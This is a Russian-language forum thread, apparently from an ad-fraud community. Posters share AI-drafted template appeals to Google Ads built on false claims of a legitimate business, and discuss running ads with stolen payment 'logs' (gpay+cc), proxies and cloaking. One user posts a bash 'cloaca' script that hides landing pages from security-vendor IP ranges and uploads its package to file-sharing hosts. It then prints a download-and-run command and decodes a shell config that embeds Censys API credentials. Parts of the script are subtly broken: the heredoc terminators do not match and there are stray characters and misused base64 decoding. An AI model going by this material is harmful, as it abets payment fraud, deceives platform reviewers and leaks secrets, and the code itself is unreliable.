I value the opportunity to advertise my flower delivery business through Google Ads, and I am committed to abiding by all terms and conditions set forth by your platform. I trust that this appeal will receive prompt attention, and my account will be reinstated after a thorough and fair review.
Thank you for your time and consideration. I look forward to a positive resolution and the continued use of Google Ads for my business.**
Немного корректирую его, убираю лишнее на мой взгляд или, наоборот, что-то
добавляю, и кидаю в папку " первая аппеляция за ПП".
Это я делаю для того, чтобы в следующем аккаунте, где будет первый бан за ПП
использовать этот текст, т.к. отправляю везде один текст.
Идем дальше, например, второй раз блокируют аккаунт за ПП (постоянные блокировки сейчас очень актуальная тема).
Даю вот такую задачу ИИ:
Hi, this is the second time my google ads account has been blocked and both times due to suspicious payments, the first time I immediately wrote an appeal and after reviewing it the google team reactivated my account with apologies. I assume that this is some kind of glitch in Google as I pay for advertising using my personal bank card, I have offered and now I will repeat that I am ready to provide any documents or screenshots confirming the legitimacy of my payment method. Help me to write an appeal based on the above information.
Получаю вот такой ответ:
**I am writing to urgently appeal the recent suspension of my Google Ads account, which marks the second occurrence of this issue due to suspected suspicious payments. It seems there may be a recurring glitch or misunderstanding within the system, as I have encountered this problem before and successfully resolved it with your team.
On the first occasion, my account was similarly suspended for the same reason, and after submitting an appeal and providing the necessary documentation to validate the authenticity of my payment method, the Google Ads team promptly reinstated my account, acknowledging the mistake and expressing apologies for the inconvenience caused.
I use my personal bank card to fund my advertising campaigns, and all transactions are legitimate and compliant with Google Ads policies. I am more than willing to provide any requested documents, screenshots, or other evidence necessary to substantiate the legitimacy of my payment method and resolve this issue swiftly.
For your reference, here are the account details:**
To expedite the resolution process, I am prepared to re-submit the previously provided supporting documentation:
**I value the opportunity to promote my flower delivery business through Google Ads and have always been committed to compliance with all relevant policies. I believe this matter is a misunderstanding or a technical glitch, and I kindly request your prompt attention to reevaluate my account and rectify this situation.
Your assistance in swiftly addressing this issue and reactivating my account would be greatly appreciated. I look forward to your timely response and the resolution of this matter.
Thank you for your attention and cooperation.**
Немного корректирую его, убираю лишнее на мой взягляд или наоборот что-то добавляю, и кидаю в папку **" вторая аппеляция за ПП" **и использую этот текст на всех аккаунтах которые заблокированы второй раз и так далее.
По остальным видам блокировок аппеляциии не пишу, так как по моему мнению, овчинка выделки не стоит, это трата времени, мне проще перейти к регистрации нового аккаунта. Примерно вот так действую в целях экономии времени и трудозатрат, т.к. работаю с большим объемом аккаунтов. Повторюсь, я просто описываю как работаю, возможно и, скорее всего, кто-то делает по другому, проще и грамотней, я делаю так и до сегодняшнего дня все работает. Кто-то вообще говрит, что пишут белиберду и все проходит, возможно и так, но я не пробовал и не хочу, мне проще делать так.
Есть ли какие то статьи/темы по настройке/работе с ними? Общую картину знаю,
ленд, софт, клоака есть. Интересует именно инфа про работу с трафиком (какие
логи подходят, а какие нет; как правильно работать с кабинетами, чтобы не
банилось и т.д.)
Готов с кем-то поработать/вложиться, есть время и прямые руки, пишите
Собственно говоря, почему может разлогиневать акк во время публикации
компании? то есть, пока я делаю все остальное - все норм, но как только
нажимаю кнопку опубликовать компанию - разлогиневает акк.
Естественно такое происходит не с каждым акком, хотя в работе подход не меняю.
Я понимаю что может быть это проблема в прокси/антик, но может ли быть такое
из-за селлеров продающих свой мат? мб они чекают на плохих прокси свой мат?
Работаю с логами gpay+cc
Еще 1 интересный момент, такое происходит в основном с ЕУ логами, с остальными
такая ситуация происходит крайне редко.
Из этого всего вытекает еще и 1 просьба, посоветуйте прокси для работы с
рекламой гугла. pia/nsoks мимо.
Вроде здесь его еще не было, может кому то будет полезен. Чувак предлагает
обучение лить на крипту за 8к $.
тык
Как раз пару дней назад пришлось на скорую руку придумать нечто подобное.
Задача, точнее ее часть, очень близко совпадала со словом "клоака"... Слово
так себе конечно, приходтся использовать) а то modrewrite
и ipset
попудярностью пользуются гораздо меньше)))) Как всегда POC в студию (и как
обычно это линукс, debian линукс..):
Bash:Copy to clipboard
mkdir /tmp/CLOACKa ; cd /tmp/CLOACKa
cat > pack.sh << 'CLOACKEr'
#!/bin/bash
[[ -z "$(type makeself)" ]] && apt-get -y install makeself #очень удобно паковать как раз "сервера"
makeself --nox11 --needroot "$(pwd)" dolanding _unknw0wn_dolanding ./init.sh "$1"
curl -s --upload-file /tmp/CLOACKa/dolanding https://x4k.sh/token\="$(openssl rand -hex 12)" | sed 's+p:+ps:+g' > /tmp/cmd ж echo 'wget -O /tmp/0cmd URLHERE && chmod +x /tmp/0cmd && /tmp/0cmd && rm /tmp/0cmd' | sed "s+URLHERE+$(cat /tmp/cmd)+g" | curl -s -F 'f:1=<-' ix.io | sed 's+http://++g' > /tmp/ccc
printf "\n\033[1;37m Do this on your VPS:\033[1;31m bash <(wget -qO- $(cat /tmp/ccc))\n" # выдаст ссылку, вам ее просто остается вставить в терминал VPS
EOF
chmod +x pack.sh
cat<<'EOF'>init.sh
#!/bin/bash
export DEBIAN_FRONTEND=noninteractive ; home="$(pwd)" ; hname="$1" ; hostname "$hname" ; echo "$hname" > /etc/hostname ; echo 127.0.0.1 localhost > /etc/hosts ; echo "$(wget -qO- ifconfig.me)" "$hname" >> /etc/hosts
#//// swap ////
dd if=/dev/zero of=/swapfile2 bs=1G count=2
mkswap /swapfile2
chmod 600 /swapfile2
swapon /swapfile2
echo '/swapfile2 none swap sw,pri=10 0 0' >> /etc/fstab ; rm /etc/motd &>/dev/null
#//// install ////
apt-get update && apt-get -y dist-upgrade ; apt-get -y purge dnsmasq &> /dev/null ; systemctl disable systemd-resolved ; systemctl stop systemd-resolved openresolv
apt-get -y install git curl sudo wget nginx python-certbot-nginx python2 python3 python-pip python-dev python3-dev dnsutils unzip ipset shc npm nodejs jq
npm i -g bash-obfuscate
#//// .zsh shell ////
#//// .zsh //// мой любимый и с моим конфигом)) делюсь самым приватом)
apt-get -y install zsh perl golang fzf -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold"
cd /root ; mkdir /tmp/LS_COLORS && curl -sL https://api.github.com/repos/trapd00r/LS_COLORS/tarball/master | tar xzf - --directory=/tmp/LS_COLORS --strip=1 &> /dev/null ; ( cd /tmp/LS_COLORS && sh install.sh ) &> /dev/null
git clone https://github.com/jotyGill/quickz-sh.git ; cd quickz-sh ; ./quickz.sh ; rm -r ../quickz-sh
wget -O /tmp/bat.deb $(curl -sL https://api.github.com/repos/sharkdp/bat/releases/latest | grep amd64.deb | grep -v musl | grep browser_download_url | head -1 | cut -d \" -f 4) && dpkg -i /tmp/bat.deb
wget -nv --show-progress https://raw.githubusercontent.com/macvk/dnsleaktest/master/dnsleaktest.sh && mv dnsleaktest.sh /usr/bin/dnsleak && chmod +x /usr/bin/dnsleak
cd /root ; curl -L https://cpanmin.us/ -o /usr/bin/cpanm ; chmod +x /usr/bin/cpanm ; alias cpan=cpanm
yes | cpan Term::ExtendedColor
yes | cpan File::LsColor
git clone git://github.com/trapd00r/ls--.git ; cd ls-- ; perl Makefile.PL ; make && make install ; cp ls++.conf $HOME/.ls++.conf
wget -nv --show-progress $(curl -sL https://api.github.com/repos/phiresky/ripgrep-all/releases/latest | grep x86_64-unknown-linux-musl.tar.gz | grep browser_download_url | head -1 | cut -d \" -f 4) && tar xf *x86_64-unknown-linux-musl.tar.gz && mv ripgrep*/* /usr/local/bin/
#//// nginx ////
cat<<EOF>/etc/nginx/sites-available/"$hname"
server {
listen 80 default_server;
listen [::]:80 default_server;
root /var/www/html;
index index.html;
server_name $hname;
location / {
try_files \$uri \$uri/ =404;
}
}
EOF
sudo systemctl reload nginx ; sleep 10 ; certbot --nginx -d "$hname" --non-interactive --agree-tos -m webmaster@"$hname" ; service nginx reload ; systemctl restart nginx
#///// ОСНОВНАЯ ЧАСТЬ - КАК РАЗ БАН ПЕСКА И реврайт ботов. Гугл причем не трогает - адвордс - ауе -чичигага
#//// bad bot blocker ////
wget https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/install-ngxblocker -O /usr/local/sbin/install-ngxblocker
chmod +x /usr/local/sbin/install-ngxblocker ; cd /usr/local/sbin ; ./install-ngxblocker -x ; chmod +x /usr/local/sbin/setup-ngxblocker ; chmod +x /usr/local/sbin/update-ngxblocker ; cd /usr/local/sbin/ ; printf "Y" | ./setup-ngxblocker -x
sed -i "s+server_name _\;+server_name _\;\n return 301 https://\$host\$request_uri\;+g" /etc/nginx/sites-available/default ; systemctl restart nginx
(crontab -l | grep . ; echo -e "00 */8 * * * sudo /usr/local/sbin/update-ngxblocker -n") | crontab -
cat<<'EOF'>/usr/local/bin/goodboyz
#!/bin/bash
ipset -q flush goodboyz ; ipset -q create goodboyz nethash
for ip in $(curl -s https://gist.githubusercontent.com/curi0usJack/971385e8334e189d93a6cb4671238b10/raw | \
grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\/(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"); \
do ipset add goodboyz $ip ; done
iptables -A INPUT -m set --match-set goodboyz src -j DROP
iptables -A FORWARD -m set --match-set goodboyz src -j DROP
curl -s https://gist.githubusercontent.com/curi0usJack/971385e8334e189d93a6cb4671238b10/raw | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\/(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" > /tmp/goodboyz
echo "" > /etc/nginx/bots.d/blacklist-ips.conf ; while read in ; do echo "$in 1;" >> /etc/nginx/bots.d/blacklist-ips.conf ; done < /tmp/goodboyz
service nginx reload ; systemctl restart nginx
EOF
chmod +x /usr/local/bin/goodboyz ; echo 'sudo goodboyz' >> /etc/rc.local ; echo exit 0 >> /etc/rc.local ; chmod +x /etc/rc.local
(crontab -l | grep . ; echo -e "00 */8 * * * sudo /usr/local/bin/goodboyz") | crontab -
#//////// мой конфиг зсхрц и приятное приведение, встречающее Вас при вхоже на сервер. мелочь, а приятно)))
#//// THE END ////
echo "Iy8vLy8vLy8vLy8vLy8gX3Vua24wd24gLnpzaHJjIGZpbGUgLy8vLy8vLy8vLy8vLy8KCmV4cG9ydCBQQVRIPS9zYmluOi9iaW46L3Vzci9sb2NhbC9zYmluOi91c3IvbG9jYWwvYmluOi91c3Ivc2JpbjovdXNyL2Jpbjovcm9vdC8ubG9jYWwvYmluOi9yb290L2dvL2Jpbi86CmV4cG9ydCBURVJNPSJ4dGVybS0yNTZjb2xvciIKZXhwb3J0IFpTSD0kSE9NRS8ub2gtbXktenNoCmV4cG9ydCBMQ19BTEw9ZW5fVVMuVVRGLTgKClpTSF9USEVNRT0icG93ZXJsZXZlbDEway9wb3dlcmxldmVsMTBrIgpQT1dFUkxFVkVMOUtfTU9ERT0nbmVyZGZvbnQtY29tcGxldGUnCkNPTVBMRVRJT05fV0FJVElOR19ET1RTPSJ0cnVlIgoKcGx1Z2lucz0oCiAgICBnaXQKICAgIHpzaC1jb21wbGV0aW9ucwogICAgenNoLWF1dG9zdWdnZXN0aW9ucwogICAgenNoLXN5bnRheC1oaWdobGlnaHRpbmcKICAgIGhpc3Rvcnktc3Vic3RyaW5nLXNlYXJjaAogICAgcHl0aG9uCiAgICBodHRwaWUKICAgIGRvY2tlcgogICAgcHllbnYKICAgIHN5c3RlbWQKICAgIGsKICAgIGZ6ZgogICAgKQoKc291cmNlICRaU0gvb2gtbXktenNoLnNoCnNvdXJjZSAiL3Jvb3QvLmxvY2FsL3NoYXJlL2xzY29sb3JzLnNoIgoKZXhwb3J0IEZaRl9ERUZBVUxUX09QUz0iLS1leHRlbmRlZCIKZXhwb3J0IE1BUktFUl9LRVlfTkVYVF9QTEFDRUhPTERFUj0iXEMtYiIKCmF1dG9sb2FkIC1VIGNvbXBpbml0ICYmIGNvbXBpbml0Ck5QTV9QQUNLQUdFUz0iJHtIT01FfS8ubnBtIgpTQVZFSElTVD01MDAwMDAKClsgLWYgfi8uZnpmLnpzaCBdICYmIHNvdXJjZSB+Ly5memYuenNoCltbIC1zICIkSE9NRS8ubG9jYWwvc2hhcmUvbWFya2VyL21hcmtlci5zaCIgXV0gJiYgc291cmNlICIkSE9NRS8ubG9jYWwvc2hhcmUvbWFya2VyL21hcmtlci5zaCIgOyBbWyAhIC1mIH4vLnAxMGsuenNoIF1dIHx8IHNvdXJjZSB+Ly5wMTBrLnpzaAoKCiMvLy8vLy8vLy8vLy8vIEFMSUFTRVMgLy8vLy8vLy8vLy8vLy8vLwojLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8KCmFsaWFzIGNhdD0iYmF0IC0tcGFnaW5nIG5ldmVyIC1wIC0tdGhlbWUgJ01vbm9rYWkgRXh0ZW5kZWQgT3JpZ2luJyIKYWxpYXMgbD0ibHMrKyAtLXBvdHNmIgphbGlhcyBsYT0ibHMrKyAtYSAtLXBvdHNmIgoKIy8vLy8vLy8vLy8vLyBGVU5DVElPTlMgLy8vLy8vLy8vLy8vLy8vCiMvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLwoKZnVuY3Rpb24ganFpcG9ydCgpIHsKY2F0ICQxIHwganEgLXIgJy5wcm94aWVzIHwgbWFwKFsuaXAsIC5wb3J0XSB8IGpvaW4oIjoiKSkgfCBqb2luKCJcbiIpJwp9CgpmdW5jdGlvbiBybmQoKSB7CmVjaG8gJCh0ciAtZGMgJ0EtWjAtOWEteicgPCAvZGV2L3VyYW5kb20gfCBoZWFkIC1jICQxKQp9CgpmdW5jdGlvbiBpeHgoKSB7CnBhc3M9IiQob3BlbnNzbCByYW5kIC1oZXggMykiCnByaW50ICIkKiIgfCBvcGVuc3NsIGVuYyAtZSAtYmFzZTY0IC1hZXMtMTI4LWN0ciAtcGJrZGYyIC1ub3NhbHQgLWsgJHBhc3MgfCBjdXJsIC1zIC1GIGY6MT0nPC0nIGl4LmlvICY+IC90bXAvLml4ZgpwcmludGYgIlwwMzNbMTszMW1peGQgJChjYXQgL3RtcC8uaXhmIHwgc2VkICdzK2h0dHA6Ly9peC5pby8rK2cnKSAkcGFzc1xuIgpwcmludGYgIlwwMzNbMG0iCn0KCmZ1bmN0aW9uIGlwZ3JlcCgpIHsKZ3JlcCAtRSAtbyAiKDI1WzAtNV18MlswLTRdWzAtOV18WzAxXT9bMC05XVswLTldPylcLigyNVswLTVdfDJbMC00XVswLTldfFswMV0/WzAtOV1bMC05XT8pXC4oMjVbMC01XXwyWzAtNF1bMC05XXxbMDFdP1swLTldWzAtOV0/KVwuKDI1WzAtNV18MlswLTRdWzAtOV18WzAxXT9bMC05XVswLTldPylcOioiICQxIAp9CgpmdW5jdGlvbiBnaSgpIHsKCXdnZXQgJDEKCWxhc3R6aXA9JChscyAtMXQgfCBoZWFkIC1uIDEpCglsYXN0ZGlyPSQodW56aXAgLWxxICRsYXN0emlwIHwgZ3JlcCAnLycgfCBoZWFkIC1uIDEgfCBhd2sgJ3twcmludGYgJDR9JykKCXVuemlwICRsYXN0emlwCglybSAkbGFzdHppcAoJc2xlZXAgMC41CgljZCAkbGFzdGRpcgp9CgpmdW5jdGlvbiBtZDVwYXNzKCkgewoJZWNobyAtbiAkMSB8IG1kNXN1bQp9CgpmdW5jdGlvbiBpcHNjYW4oKSB7CglydXN0c2NhbiAkMSAtYiAxMDAwIC0tIC12diAtUG4gLXNWIC1BIC1UNSAtLXNjcmlwdCB2dWxuIC1vTiBubWFwLSQxCn0KCmZ1bmN0aW9uIGNlbnN5cygpIHsKZXhwb3J0IENFTlNZU19BUElfSUQ9YzExODEzZTAtNWQwZi00M2U4LWI4NTMtYWZiZmI4NzhhYjI0OyBleHBvcnQgQ0VOU1lTX0FQSV9TRUNSRVQ9aFMxQ09zbHhEMnppUTdzaWQ5WHJISlZKdHZLbnc3eEYKL3Vzci9sb2NhbC9iaW4vY2Vuc3lzIHNlYXJjaCAtcSAkMSAtLWZpZWxkcyBpcHY0IHwganEgfCBzZWQgJ3MrXFsrK2cnIHwgc2VkICdzK1xdKytnJyB8IHNlZCAncyt7KytnJyB8IHNlZCAncyt9KytnJyB8IHNlZCAncytcLCsrZycgfCBjY2F0Cn0KCmZ1bmN0aW9uIHVwbCgpewppZiBbICQjIC1lcSAwIF0gOyB0aGVuIGVjaG8gIk5vIGFyZ3VtZW50cyBzcGVjaWZpZWQuXG5Vc2FnZTpcbiAgdHJhbnNmZXIgPGZpbGV8ZGlyZWN0b3J5PlxuICAuLi4gfCB0cmFuc2ZlciA8ZmlsZV9uYW1lPiI+JjIgOyByZXR1cm4gMSA7IGZpCiAgaWYgdHR5IC1zIDsgdGhlbiBmaWxlPSIkMSIgOyBmaWxlX25hbWU9JChiYXNlbmFtZSAiJGZpbGUiKSA7IGlmIFsgISAtZSAiJGZpbGUiIF0gOyB0aGVuIGVjaG8gIiRmaWxlOiBObyBzdWNoIGZpbGUgb3IgZGlyZWN0b3J5Ij4mMiA7IHJldHVybiAxIDsgZmkgOwogICAgaWYgWyAtZCAiJGZpbGUiIF0gOyB0aGVuIGZpbGVfbmFtZT0iJGZpbGVfbmFtZS56aXAiICwgOyAoY2QgIiRmaWxlIiYmemlwIC1yIC1xIC0gLikgfCBjdXJsIC0tcHJvZ3Jlc3MtYmFyIC0tdXBsb2FkLWZpbGUgIi0iICJodHRwczovL3g0ay5zaC8kZmlsZV9uYW1lIiB8IHNlZCAncytzaC8rc2gvZ2V0LytnJyB8IHNlZCAncytodHRwOi8vKytnJyAmJiBlY2hvICIiIHwgdGVlIC9kZXYvbnVsbCwKICBlbHNlIGNhdCAiJGZpbGUiIHwgY3VybCAtLXByb2dyZXNzLWJhciAtLXVwbG9hZC1maWxlICItIiAiaHR0cHM6Ly94NGsuc2gvLyRmaWxlX25hbWUiIHwgIHNlZCAncytzaC8rc2gvZ2V0LytnJyB8IHNlZCAncytodHRwOi8vKytnJyAmJiBlY2hvICIiIHwgdGVlIC9kZXYvbnVsbCA7IGZpCmVsc2UgZmlsZV9uYW1lPSQxIDsgY3VybCAtLXByb2dyZXNzLWJhciAtLXVwbG9hZC1maWxlICItIiAiaHR0cHM6Ly94NGsuc2gvLyRmaWxlX25hbWUiIHwgIHNlZCAncytzaC8rc2gvZ2V0LytnJyB8IHNlZCAncytodHRwOi8vKytnJyAmJiBlY2hvICIiIHwgdGVlIC9kZXYvbnVsbCA7IGZpCn0KCmZ1bmN0aW9uIHNlZHIoKSB7CglmaW5kIC4gLXR5cGUgZiAtcHJpbnQwIHwgeGFyZ3MgLTAgc2VkIC1pICJzKyQxKyQyK2ciCn0KCmxnKCkgewogICAgZ2l0IGFkZCAuCiAgICBnaXQgY29tbWl0IC1hIC1tICJ4IgogICAgZ2l0IHB1c2gKfQoKc3BlZWR0ZXN0KCkgewogICAgY3VybCAtcyBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vc2l2ZWwvc3BlZWR0ZXN0LWNsaS9tYXN0ZXIvc3BlZWR0ZXN0LnB5IHwgcHl0aG9uMyAtCn0KCmNsZWFyIDsgY2F0IC91c3Ivc2hhcmUvbG9nbwo=" | base64 -d -w 0 > /root/.zshrc
echo "# Generated by Powerlevel10k configuration wizard on 2020-06-12 at 13:20 CEST.
# Based on romkatv/powerlevel10k/config/p10k-pure.zsh, checksum 00682.
# Wizard options: nerdfont-complete + powerline, large icons, pure, 24h time, 2 lines,
# sparse, instant_prompt=off.
# Type `p10k configure` to generate another config.
#
# Config file for Powerlevel10k with the style of Pure (https://github.com/sindresorhus/pure).
#
# Differences from Pure:
#
#   - Git:
#     - `@c4d3ec2c` instead of something like `v1.4.0~11` when in detached HEAD state.
#     - No automatic `git fetch` (the same as in Pure with `PURE_GIT_PULL=0`).
#
# Apart from the differences listed above, the replication of Pure prompt is exact. This includes
# even the questionable parts. For example, just like in Pure, there is no indication of Git status
# being stale; prompt symbol is the same in command, visual and overwrite vi modes; when prompt
# doesn't fit on one line, it wraps around with no attempt to shorten it.
#
# If you like the general style of Pure but not particularly attached to all its quirks, type
# `p10k configure` and pick "Lean" style. This will give you slick minimalist prompt while taking
# advantage of Powerlevel10k features that aren't present in Pure.

# Temporarily change options.
'builtin' 'local' '-a' 'p10k_config_opts'
[[ ! -o 'aliases'         ]] || p10k_config_opts+=('aliases')
[[ ! -o 'sh_glob'         ]] || p10k_config_opts+=('sh_glob')
[[ ! -o 'no_brace_expand' ]] || p10k_config_opts+=('no_brace_expand')
'builtin' 'setopt' 'no_aliases' 'no_sh_glob' 'brace_expand'

() {
  emulate -L zsh

  # Unset all configuration options.
  unset -m 'POWERLEVEL9K_*|DEFAULT_USER'

  # Zsh >= 5.1 is required.
  autoload -Uz is-at-least && is-at-least 5.1 || return

  # Prompt colors.
  local grey='242'
  local red='1'
  local yellow='3'
  local blue='4'
  local magenta='5'
  local cyan='6'
  local white='7'

  # Left prompt segments.
  typeset -g POWERLEVEL9K_LEFT_PROMPT_ELEMENTS=(
    # =========================[ Line #1 ]=========================
    context                   # user@host
    dir                       # current directory
#    vcs                       # git status
    command_execution_time    # previous command duration
    # =========================[ Line #2 ]=========================
    
    newline                   # \n
    virtualenv                # python virtual environment
    prompt_char               # prompt symbol
  )

  # Right prompt segments.
  typeset -g POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS=(
    # =========================[ Line #1 ]=========================
    # command_execution_time  # previous command duration
    # virtualenv              # python virtual environment
    # context                 # user@host
    public_ip
#    time                      # current time
    # =========================[ Line #2 ]=========================
    newline                   # \n
  )

  # Basic style options that define the overall prompt look.
  typeset -g POWERLEVEL9K_BACKGROUND=                            # transparent background
  typeset -g POWERLEVEL9K_{LEFT,RIGHT}_{LEFT,RIGHT}_WHITESPACE=  # no surrounding whitespace
  typeset -g POWERLEVEL9K_{LEFT,RIGHT}_SUBSEGMENT_SEPARATOR=' '  # separate segments with a space
  typeset -g POWERLEVEL9K_{LEFT,RIGHT}_SEGMENT_SEPARATOR=        # no end-of-line symbol
  typeset -g POWERLEVEL9K_VISUAL_IDENTIFIER_EXPANSION=           # no segment icons

  # Add an empty line before each prompt except the first. This doesn't emulate the bug
  # in Pure that makes prompt drift down whenever you use the Alt-C binding from fzf or similar.
  typeset -g POWERLEVEL9K_PROMPT_ADD_NEWLINE=true

  # Magenta prompt symbol if the last command succeeded.
  typeset -g POWERLEVEL9K_PROMPT_CHAR_OK_{VIINS,VICMD,VIVIS}_FOREGROUND=$magenta
  # Red prompt symbol if the last command failed.
  typeset -g POWERLEVEL9K_PROMPT_CHAR_ERROR_{VIINS,VICMD,VIVIS}_FOREGROUND=$red
  # Default prompt symbol.
  typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIINS_CONTENT_EXPANSION='❯'
  # Prompt symbol in command vi mode.
  typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VICMD_CONTENT_EXPANSION='❮'
  # Prompt symbol in visual vi mode is the same as in command mode.
  typeset -g POWERLEVEL9K_PROMPT_CHAR_{OK,ERROR}_VIVIS_CONTENT_EXPANSION='❮'
  # Prompt symbol in overwrite vi mode is the same as in command mode.
  typeset -g POWERLEVEL9K_PROMPT_CHAR_OVERWRITE_STATE=false

  # Grey Python Virtual Environment.
  typeset -g POWERLEVEL9K_VIRTUALENV_FOREGROUND=$grey
  # Don't show Python version.
  typeset -g POWERLEVEL9K_VIRTUALENV_SHOW_PYTHON_VERSION=false
  typeset -g POWERLEVEL9K_VIRTUALENV_{LEFT,RIGHT}_DELIMITER=

  # Blue current directory.
  typeset -g POWERLEVEL9K_DIR_FOREGROUND=$blue

  # Context format when root: user@host. The first part white, the rest grey.
  typeset -g POWERLEVEL9K_CONTEXT_ROOT_TEMPLATE="%F{$white}%n%f%F{$grey}@%m%f"
  # Context format when not root: user@host. The whole thing grey.
  typeset -g POWERLEVEL9K_CONTEXT_TEMPLATE="%F{$grey}%n@%m%f"
  # Don't show context unless root or in SSH.
  typeset -g POWERLEVEL9K_CONTEXT_{DEFAULT,SUDO}_CONTENT_EXPANSION=

  # Show previous command duration only if it's >= 5s.
  typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=5
  # Don't show fractional seconds. Thus, 7s rather than 7.3s.
  typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
  # Duration format: 1d 2h 3m 4s.
  typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_FORMAT='d h m s'
  # Yellow previous command duration.
  typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_FOREGROUND=$yellow

  # Grey Git prompt. This makes stale prompts indistinguishable from up-to-date ones.
  typeset -g POWERLEVEL9K_VCS_FOREGROUND=$grey

  # Disable async loading indicator to make directories that aren't Git repositories
  # indistinguishable from large Git repositories without known state.
  typeset -g POWERLEVEL9K_VCS_LOADING_TEXT=

  # Don't wait for Git status even for a millisecond, so that prompt always updates
  # asynchronously when Git state changes.
  typeset -g POWERLEVEL9K_VCS_MAX_SYNC_LATENCY_SECONDS=0

  # Cyan ahead/behind arrows.
  typeset -g POWERLEVEL9K_VCS_{INCOMING,OUTGOING}_CHANGESFORMAT_FOREGROUND=$cyan
  # Don't show remote branch, current tag or stashes.
  typeset -g POWERLEVEL9K_VCS_GIT_HOOKS=(vcs-detect-changes git-untracked git-aheadbehind)
  # Don't show the branch icon.
  typeset -g POWERLEVEL9K_VCS_BRANCH_ICON=
  # When in detached HEAD state, show @commit where branch normally goes.
  typeset -g POWERLEVEL9K_VCS_COMMIT_ICON='@'
  # Don't show staged, unstaged, untracked indicators.
  typeset -g POWERLEVEL9K_VCS_{STAGED,UNSTAGED,UNTRACKED}_ICON=
  # Show '*' when there are staged, unstaged or untracked files.
  typeset -g POWERLEVEL9K_VCS_DIRTY_ICON='*'
  # Show '⇣' if local branch is behind remote.
  typeset -g POWERLEVEL9K_VCS_INCOMING_CHANGES_ICON=':⇣'
  # Show '⇡' if local branch is ahead of remote.
  typeset -g POWERLEVEL9K_VCS_OUTGOING_CHANGES_ICON=':⇡'
  # Don't show the number of commits next to the ahead/behind arrows.
  typeset -g POWERLEVEL9K_VCS_{COMMITS_AHEAD,COMMITS_BEHIND}_MAX_NUM=1
  # Remove space between '⇣' and '⇡' and all trailing spaces.
  typeset -g POWERLEVEL9K_VCS_CONTENT_EXPANSION='${${${P9K_CONTENT/⇣* :⇡/⇣⇡}// }//:/ }'

  # Grey current time.
  typeset -g POWERLEVEL9K_TIME_FOREGROUND=$grey
  # Format for the current time: 09:51:02. See `man 3 strftime`.
  typeset -g POWERLEVEL9K_TIME_FORMAT='%D{%H:%M:%S}'
  # If set to true, time will update when you hit enter. This way prompts for the past
  # commands will contain the start times of their commands rather than the end times of
  # their preceding commands.
  typeset -g POWERLEVEL9K_TIME_UPDATE_ON_COMMAND=false

  # Transient prompt works similarly to the builtin transient_rprompt option. It trims down prompt
  # when accepting a command line. Supported values:
  #
  #   - off:      Don't change prompt when accepting a command line.
  #   - always:   Trim down prompt when accepting a command line.
  #   - same-dir: Trim down prompt when accepting a command line unless this is the first command
  #               typed after changing current working directory.
  typeset -g POWERLEVEL9K_TRANSIENT_PROMPT=off

  # Instant prompt mode.
  #
  #   - off:     Disable instant prompt. Choose this if you've tried instant prompt and found
  #              it incompatible with your zsh configuration files.
  #   - quiet:   Enable instant prompt and don't print warnings when detecting console output
  #              during zsh initialization. Choose this if you've read and understood
  #              https://github.com/romkatv/powerlevel10k/blob/master/README.md#instant-prompt.
  #   - verbose: Enable instant prompt and print a warning when detecting console output during
  #              zsh initialization. Choose this if you've never tried instant prompt, haven't
  #              seen the warning, or if you are unsure what this all means.
  typeset -g POWERLEVEL9K_INSTANT_PROMPT=off

  # Hot reload allows you to change POWERLEVEL9K options after Powerlevel10k has been initialized.
  # For example, you can type POWERLEVEL9K_BACKGROUND=red and see your prompt turn red. Hot reload
  # can slow down prompt by 1-2 milliseconds, so it's better to keep it turned off unless you
  # really need it.
  typeset -g POWERLEVEL9K_DISABLE_HOT_RELOAD=true

  # If p10k is already loaded, reload configuration.
  # This works even with POWERLEVEL9K_DISABLE_HOT_RELOAD=true.
  (( ! $+functions[p10k] )) || p10k reload
}

# Tell `p10k configure` which file it should overwrite.
typeset -g POWERLEVEL9K_CONFIG_FILE=${${(%):-%x}:a}

(( ${#p10k_config_opts} )) && setopt ${p10k_config_opts[@]}
'builtin' 'unset' 'p10k_config_opts'
" | base64 -d -w 0 > /root/.p10k.zsh
echo "
                     [38;5;235m▄[38;5;59m▄[38;5;248m▄[48;5;235;38;5;251m▄[48;5;235;38;5;252m▄[48;5;238;38;5;253m▄[48;5;243;38;5;254m▄[48;5;246;38;5;254m▄[48;5;247;38;5;254m▄[48;5;247;38;5;254m▄[48;5;247m▄[48;5;247;38;5;254m▄[48;5;246;38;5;254m▄[48;5;242;38;5;253m▄[48;5;238;38;5;188m▄[48;5;235;38;5;251m▄[48;5;235;38;5;249m▄[49;38;5;246m▄[38;5;240m▄[38;5;235m▄[39m                  [00m
